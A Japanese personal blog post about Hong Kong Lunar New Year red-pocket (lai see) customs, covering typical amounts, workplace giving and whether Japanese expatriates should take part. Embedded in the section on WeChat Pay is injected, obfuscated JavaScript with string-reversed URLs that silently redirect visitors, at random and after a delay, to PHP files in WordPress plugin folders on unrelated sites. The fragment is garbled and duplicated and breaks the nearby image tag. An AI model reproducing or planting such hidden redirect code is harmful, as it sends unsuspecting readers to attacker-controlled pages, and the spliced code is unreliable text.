MENU
カテゴリ
AYA
2016年~香港移住。 香港旅行のスポット情報・グルメ情報を紹介中。その他、台湾、アジアのリゾートも。Twitterではデモ情報や毎日の天気もつぶやいているのでそちらも見てみてください!

香港在住日本人はお年玉(レッドポケット/利是)を渡す渡さない問題

旧正月まであと少し。香港の街は旧正月の飾りつけが完了し赤で埋め尽くされています。お正月の風物詩と言えばお年玉ですが、香港でもRed Pocketと呼ばれるお年玉(利是)を配る習慣があります。

日本人だから関係ないと思っている駐在員やその奥様も多くおられますが、”郷に入れば郷に従え”ということで覚えておくといい習慣の1つです。

今回は香港のお年玉の相場や香港在住の日本人はどうしたらいいかなどについて紹介します。

目次

香港のお年玉レッドポケット利是(広東語ライシー)とは

利是(広東語ライシー)は旧正月などに配るお年玉です。中国では赤の袋に入れて渡されるため、”紅包(ホンバオ)”と呼ばれます。

基本は既婚者が渡す

香港では、既婚者は年齢にかかわらず、独身の同僚や親戚、友人にお年玉を配る習慣があります。

結婚適齢期を過ぎた独身(特に女性)に渡すのは躊躇するかもしれませんが、香港人はお金もらうことには常にウェルカムなので普通に配って問題ありません。

誰に配るの?

旧正月のお年玉は、親戚や子供はもちろん、日頃からお世話になっている人に配ります。

例えば、マンションの管理人やよく行くレストランの店員さん、会社の部下、得意先など幅広く配ります。

香港のお年玉の相場は?

今は10ドルというのはもうほとんどなく、少なくとも20ドル~になります。顔見知り程度の人には20ドル~、少しお世話になった人には50ドル~、とてもお世話になっている人には100ドル~と言った具合に人によって金額を変えます。

そのため、金額によって封筒を換えておくと大変便利です。20ドルのお年玉の場合はいつでもだれにでも渡せるように小さい袋にしておくことが多いです。ただ、小さい袋だと折り曲げて封筒に入れないといけないので、作業が少し大変です。

※中国のお年玉「紅包」は香港と相場が異なるので注意です。

既婚、未婚関係なく配る必要がある「開工利是」

会社のトップ(社長)から従業員全員に配るお年玉、上司から部下に配るお年玉を「開工利是」といいます。この場合は、上司が既婚、未婚に関らず部下がいる場合はお年玉を配る必要があります。従業員の人数にもよりますが、大きな会社では20、50ドルが多く、小さな会社では100ドル以上もらえることもあります。

私が以前所属していた日系の会社では、中国地区で働いている従業員(マネージャー以上)には「紅包(ホンバオ)手当」というものがありました。例えば、部下が30人だとすると、100元×30人で3000元(約6万円)と人によって負担が大きくなるため、会社が何割か支給する仕組みでした。 従業員(部下)が多い中国地区ならではの手当ですね。

※中国のお年玉「紅包」は香港と相場が異なるので注意です。

香港在住の日本人はお年玉どうするの?

お年玉を渡す習慣のある香港(もしくは中国)で働いている日本人は渡すか渡さないかという議論は、毎年どこかで行われていますよね。

私の意見としては、日本人でも香港にいるなら渡すべきだと思っています。日本円にしてたったの300円~ですし、普段お世話になっているマンションの管理人さんやいつも顔なじみの店員さんなど、お年玉を渡すとものすごく喜ばれ、1年とても親切にしてくれます。渡さなかったからといって不親切になるわけではありませんが、気持ちの持ちようかなと思います。

1年間ケチ扱いされる?

たまに日系の会社で見かけるのが、駐在員の社長(総経理)や上司が部下に渡さないパターン。

お年玉を配るという文化を知らなかったという方は仕方ありませんが、知っているけど、「私は日本人だから関係ない」なんて思っていたら、香港人部下から確実に嫌われるのでご注意ください。

その場合は、サポートしない奥様も常識ないというレッテルが香港人内で貼られます。(香港社会はお金に怖い)

香港在住の日本人独身は?(私の場合)

私は以前香港で働いているときは独身でしたが、普段お世話になっているマンションの管理人さん、顔なじみの店員さん、会社でお世話になっている人には配っていました。

香港のルールからすると「独身は配る必要はない」に当てはまるのですが、10代ではなかったということと、普段お世話になっている人へのマナーだと考えていました。またせっかく香港で働いているんだから香港の文化を経験したいという考えもありました。

ちなみに別の会社で働いていた私の友人(香港在住・独身・日本人/アメリカ人/フランス人) もお世話になっている人にお年玉を配っていたので、独身でも配っている人は多いのかなと思います。

お年玉用の新札両替はいつから?

旧正月の始まる2週間前くらいから各銀行にて新札両替が行われます。そのため、旧正月前までは銀行に行列ができます。準備が遅くなると必要な額の新札がもらえないことがありますが、比較的きれいな紙幣を使えば問題ありません。

香港は中国と違ってまだまだ現金でのやり取りが多いので、必要最低限の人にしか渡さないという方はわざわざ両替は必要ないかもしれませんね。

中国では現金よりWechatpayが主流?

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolife alignnone” src=”https://www.bigomagazine.com/wp-content/uploads/hatena/20190121180637.jpg” alt=”Wechatpayでお年玉レッドポケットを送金” width=”1000″ height=”667″ />

現金がなくても生きていけると言われている中国。赤い封筒”紅包”を使い、直接現金を渡し場合が多いですが、離れている親族や家族間などは携帯電話の電子決済での受け渡しが見受けられます。

香港のお年玉事情まとめ

大人でももらえる香港のお年玉。

たった数百円でケチ扱いされないよう香港在住者の日本人駐在員の方は出来る限り部下にはお年玉の用意をしておいてくださいね。

▼香港にいらっしゃる際はこちらの情報を参考にしてください。

Blogランキング参加中。応援(クリック)よろしくお願いします!

にほんブログ村 海外生活ブログ 香港情報へ
にほんブログ村

この記事が気に入ったら
いいね または フォローしてね!

よかったらシェアしてね!
  • URLをコピーしました!
  • URLをコピーしました!

この記事を書いた人

2016年~香港移住。 香港旅行のスポット情報・グルメ情報を紹介中。その他、台湾、アジアのリゾートも。Twitterではデモ情報や毎日の天気もつぶやいています。

この記事も読まれています

コメント

コメントする

目次